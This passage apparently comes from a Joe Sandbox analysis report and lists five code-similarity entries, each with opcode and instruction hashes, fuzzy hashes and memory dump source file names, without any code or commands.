                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 55d2f4f35a028b2a1cb313dedf6c028d876d86da5cafead93d6f3f4d949411c4
                                                                                                                                                                                                                                  • Instruction ID: 21334345bae6e2bab1741bcd993693ac030147313a06538c6d3cb21885a8a842
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55d2f4f35a028b2a1cb313dedf6c028d876d86da5cafead93d6f3f4d949411c4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C11F778E04208EFCB44DFA8D584AEDBBB1FB48354F6081A9E815AB351C371AA45DB91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908542497.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5700000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 537648538e23a584de682748c0df7cf2b9e19c89c2c9b8cc198d6451f7d69307
                                                                                                                                                                                                                                  • Instruction ID: d6f797f66b352e080278464732f758725f29adfad36ecd624084098575b70129
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 537648538e23a584de682748c0df7cf2b9e19c89c2c9b8cc198d6451f7d69307
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0711F078901208EFCB40DFA8C444AAEBBF0FF08310F1080A9E814A7360D3319B90DB90
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908665172.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5710000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ed09d1b0cf736dac55933dcd6655d817fd8f926b68dd5226da2bd722263b49d1
                                                                                                                                                                                                                                  • Instruction ID: 9d29188e2cf44e9e8ea66f9d30b1297c116f6b1581d5610bb8c4eba8c2079d57
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed09d1b0cf736dac55933dcd6655d817fd8f926b68dd5226da2bd722263b49d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF0EC35643109ABC740EBB8D525B5E77F9F787300F5494659406D3341DA394E42E786
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908665172.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5710000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6cf19ed9842ac197d90b48ed64cbab77d05af1c14824519124e0f891af79001a
                                                                                                                                                                                                                                  • Instruction ID: 82627a6390f0072b79109566e3d83afee5de1017b43f50ba352f3f70ae673538
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cf19ed9842ac197d90b48ed64cbab77d05af1c14824519124e0f891af79001a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5017E78A40219CFDBA4CF59C988FA9BBB1BF09310F1590D6E509B7261CB719E84DF14
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2908665172.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_5710000_4BC4.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0458e98cd368d082cc4bf049b6db1e8507c9fa11a0f8b18b6cbc057213b088f4
                                                                                                                                                                                                                                  • Instruction ID: 2da6d948a1f84f15e29eb9e37270ca4e83956ab111eb6bc20320c8b041ea81d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0458e98cd368d082cc4bf049b6db1e8507c9fa11a0f8b18b6cbc057213b088f4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8E0D83474610DAFC754EFB8D414B5E77FAEB86300F505869940AE3390DE395E41D78A